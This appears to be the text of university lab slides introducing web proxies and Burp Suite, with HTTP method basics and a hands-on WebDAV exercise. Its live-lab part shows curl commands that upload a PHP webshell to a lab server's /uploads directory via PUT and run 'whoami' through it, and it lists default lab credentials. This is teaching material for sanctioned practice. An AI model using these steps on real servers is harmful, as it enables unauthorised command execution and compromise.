CYBER SECURITY

LAB 03: Web Proxies (Burp Suite)

What Are Web Proxies?

Web Proxy vs Web Proxy Server

Introduction To Burp Suite

Interacting with the web app with Burp Suite

Hands-On
HTTP Methods Recap
● GET: Used for retrieving data from the server. It should not have any
side effects on the server or the application. (Nothing much we can
expect)
● POST: Used for submitting data to the server, often for actions that
modify data on the server, like submitting a form. (Like Login Form)
● PUT: Used for updating a resource (file) on the server with a new
representation. It should be idempotent, meaning multiple requests
should have the same effect as a single request.
● DELETE: Used for removing a resource from the server.
● OPTIONS: Used to query the server about the communication
options and requirements for a specific resource, such as a URL or
endpoint.
 Live Lab:
HTTP
Method
Enumeratio
n
Using dirb to identify hidden
directories
● Dirb is a lightweight, command-line tool for scanning
and finding find hidden folders/directories and files
that may not be displayed on the front-end of the web application.
● Command: dirb http://192.X.Y.3
Using dirb to identify hidden
directories
● The directories which are present on the server are css, img, js, mail, uploads and vendor.
Interacting with uploads
directory with
● Step 1: Checking the content of /uploads directory.
Interacting with uploads
directory with
● Step 2: Sending OPTIONS request to /uploads directory
● Command: curl -v -X OPTIONS 192.X.Y.3/uploads/
Interacting with uploads
directory with
● The Webdav module is enabled on the Apache Server.
● Webdav module allows file upload via PUT method.
● Step 3: Uploading a file with PUT method
● Command: curl http://192.X.Y.3/uploads/
--upload-file /usr/share/webshells/php/simple-backdoor.php
Interacting with uploads
directory with
● Step 4: Checking content of /uploads directory
Interacting with uploads
directory with
● Step 5: Try to run commands on the web server
● URL: http://192.X.Y.3/uploads/simple-backdoor.php?cmd=whoami
Interacting with uploads
directory with
● Step 6: Using the DELETE method to delete the file
● Command: curl -v -X DELETE 192.X.Y.3/uploads/simple-backdoor.php
Interacting with uploads
directory with
● Step 7: Checking the content of /uploads directory
● The file was deleted successfully.
Introductio
n to
Web
Proxies
What Are Web Proxies?
● A web proxy/interception proxy is a tool that is used to capture, analyze and
modify requests and responses exchanged between an HTTP client and a server.
● By intercepting HTTP/HTTPS requests and responses, we can analyze and study
the behavior and functionality of a web application.
● Proxies are a fundamental component of web application penetration tests and
will become one of your most trusted allies when assessing and testing web apps.
● The most popular and widely utilized web proxies
used today are:
o Burp Suite
o OWASP ZAP
Web Proxy vs Web Proxy Server
● It is important to distinguish between web proxies and proxy servers.
● A web proxy is used to intercept, analyze or modify HTTP/HTTPS requests sent between a
client and server which runs on Client-Side (Burp Suite or OWASP ZAP).
● A web proxy server is used to proxy internet traffic, filter specific traffic and optimize
bandwidth (Cloudflare).
● The next two illustrations will clarify this distinction.
Web Proxy Illustrated
● In this case, the web proxy is an application that intercepts traffic sent and received by the
browser.
Web Proxy Server Illustrated
● In this case, the web proxy server filters all the traffic coming to and from the client.
Why use Web Proxies?
● We will utilize web proxies to intercept, analyze and modify HTTP requests exchanged
between a client and server prior to the traffic being sent to the web server. (Man In the
Middle)
● Web proxies typically work by intercepting the traffic being sent by the client browser, this
is achieved by configuring the browser to send all traffic through your web proxy of choice.
● The primary objective for intercepting requests and responses is to:
o Analyze the behavior and functionality of web applications.
o Map out the structure of the web application (sitemap, uploads folder, admin panel, etc).
o Identify vulnerabilities and misconfigurations in web applications.
o Assess and attack web applications.
Introductio
n to Burp
Suite
Introduction To Burp Suite
● Burp Suite is an industry standard web proxy written in Java and developed by
PortSwigger.
● It is used by penetration testers, developers and security researchers to analyze, map and
assess the security of web applications.
● Burp Suite offers a plethora of features and functionality like:
o The ability to intercept requests and responses between your browser and the web server/web
application.
o Modify/craft requests manually.
o Crawl web applications automatically.
o Fuzz web applications by sending patterns of valid and invalid inputs to test their behavior.
Burp Suite Editions
● Burp Suite has two editions:
● Community Edition - Provides you with everything you need to get started and is designed
for students or professionals looking to learn more about Cyber Security. Features include:
o HTTP(s) Proxy.
o Modules - Repeater, Decoder, Sequencer & Comparer.
o Lite version of the Intruder module (Performance Throttling).
● Professional Edition - Faster, more reliable offering designed for penetration testers and
security professionals. Features include everything in the community edition plus:
o Project files.
o No performance throttling.
o Intruder - Fully featured module.
o Custom PortSwigger payloads.
o Automatic scanner and crawler.
Installing Burp Suite Windows

https://portswigger.net/burp/releases/community/latest
Interacting with the web app
with
● Step 1: Set the FoxyProxy to use the burp proxy.
Click on the Fox icon and select “Burp Suite”.
Interacting with the web app
with
● Step 2: Start burp suite. Reload the page and the request will be intercepted.
Interacting with the web app
with
● Step 3: Sending request to Repeater.
Interacting with the web app
with
● Step 3: Repeater Tab:
Interacting with the web app
with
● Step 4: Sending GET Request.
Interacting with the web app
with
● Step 5: Sending HEAD Request
Interacting with the web app
with
● Step 6: Sending OPTIONS request.
Interacting with the web app
with
● Step 7: Sending POST request.
● POST method is not allowed.
Interacting with the web app
with
● Step 8: Sending POST request to login.php with incorrect login credentials.
● 200 OK response is received.
Interacting with the web app
with
● Step 9: Sending POST request with valid login credentials.
● The login credentials were correct and as a result 302 Found response was received to
index.php.
Interacting with the web app
with
● Step 10: Uploading file with PUT method.
● The file was uploaded Successfully.
Interacting with the web app
with
● Checking the files in /uploads directory.
● The file "hello.txt" was uploaded successfully.
Interacting with the web app
with
● Checking Content of uploaded file.
Interacting with the web app
with
● Step 11: Deleting the File.
● The file was deleted Successfully.
Interacting with the web app
with
● Checking the files in /uploads directory.
● The file "hello.txt" was not found anymore.
Hands-On: WebDAV Exploitation
via Burp Suite
(is.gd/lab3a)
Hands-On: WebDAV Exploitation
via Burp Suite
(is.gd/lab3a)
Hands-On: WebDAV Exploitation
via Burp Suite
● Find the hidden directory on the website. (Use dirb tool).
(is.gd/lab3a)
● Login with Username: wampp and Password: xampp.
● Upload hello.txt file which contains “Hello World” using PUT method. (Can you
create it?)
● Check the file in the directory. (Did you find it?)
● Check the content of uploaded file using GET method. (Where is the file content
now?)
● Delete the file from /uploads directory using DELETE method. (Does it exist
anymore?)
Before Next Lab
● Create an account on PortSwigger Web Security Academy.
● Next Labs Hands-On will be conducted using this platform.

https://portswigger.net/users/register
QUESTIONS?
THANK YOU